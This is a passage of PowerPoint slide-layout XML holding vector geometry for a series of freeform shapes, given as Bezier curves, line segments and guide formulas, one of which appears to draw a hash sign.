                      <a:pt x="170" y="188"/>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200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="53"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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>
                      <a:pt x="6" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32"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0" y="23"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="144"/>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="150"/>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8"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="191"/>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1"/>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0"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="97" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="101" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="71"/>
                      <a:pt x="90" y="74"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>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99"/>
                      <a:pt x="56" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="51" y="108"/>
                      <a:pt x="50" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="137"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="141"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="129"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="122"/>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69"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="181"/>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3" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="178"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="113"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5" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="138"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>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2" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105"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7"/>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7" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="86" y="40"/>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6" y="33"/>
                      <a:pt x="65" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="42"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74"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0" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="62"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78"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1" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>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Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4077" y="224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Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4089" y="2249"/>
                <a:ext cx="4" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 3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1"/>
                      <a:pt x="3"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Freeform 54"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="20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Freeform 55"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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Freeform 56"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="242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Freeform 57"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2620"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Freeform 58"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2770"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Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2918"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4"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Freeform 60"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="311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Freeform 61"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="326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Freeform 62"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="345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Freeform 63"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3656"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Freeform 64"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3805" y="2929"/>
                <a:ext cx="155" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 100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Freeform 65"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="2933"/>
                <a:ext cx="189" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 218"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 132 w 189"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 134 h 218"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 152 h 218"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 152 h 218"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 218 h 218"/>
                  <a:gd name="T16" fmla="*/ 93 w 189"/>
                  <a:gd name="T17" fmla="*/ 218 h 218"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 152 h 218"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 152 h 218"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 218 h 218"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 218 h 218"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 152 h 218"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 152 h 218"/>
                  <a:gd name="T30" fmla="*/ 4 w 189"/>
                  <a:gd name="T31" fmla="*/ 134 h 218"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 218"/>
                  <a:gd name="T38" fmla="*/ 16 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 218"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 218"/>
                  <a:gd name="T42" fmla="*/ 75 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 218"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 218"/>
                  <a:gd name="T46" fmla="*/ 83 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 218"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 218"/>
                  <a:gd name="T50" fmla="*/ 139 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 218"/>
                  <a:gd name="T52" fmla="*/ 160 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 218"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 218"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 218"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 218"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 111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7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111"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Freeform 66"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4207" y="2929"/>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2"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Freeform 67"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4402" y="2929"/>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0"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27"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Freeform 68"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4600" y="292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Freeform 69"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="474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Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4942"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Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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72"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="533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Freeform 73"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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74"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5680" y="292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5"/>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Freeform 75"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5830" y="292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5"/>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Freeform 76"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5978"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3" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="200"/>
                      <a:pt x="36" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
